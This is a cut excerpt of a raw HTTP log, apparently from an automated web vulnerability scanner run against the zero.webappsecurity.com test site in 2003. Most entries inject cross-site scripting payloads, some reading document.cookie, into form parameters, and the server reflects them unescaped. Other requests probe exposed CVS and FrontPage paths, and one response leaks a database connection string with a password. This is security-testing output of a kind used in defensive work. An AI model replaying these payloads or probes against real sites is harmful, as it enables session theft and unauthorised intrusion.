</form>
</BODY></HTML>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=</textarea><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT
ETag: "4e255fea9dc11:8f6"
Content-Length: 37
<A HREF="./link9/index.htm">Link9</A>GET /_vti_log/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /CVS/Repository HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:23 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:29 GMT
ETag: "343d74b4ba97c11:8f6"
Content-Length: 18
/home/src/html00
GET /join.asp?name=&email=&surname=>"'><img%20src="javascript:alert('XSS')">&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3990
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center></textarea><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4001
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>1"style="background:url(javascript:alert('XSS'))" "</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /plink.asp?a=</textarea><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 206
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = </textarea><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=</textarea><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 389
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = </textarea><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=test@<script>alert(document.cookie)</script>.com&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 364
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = test@<script>alert(document.cookie)</script>.com</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=>"><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
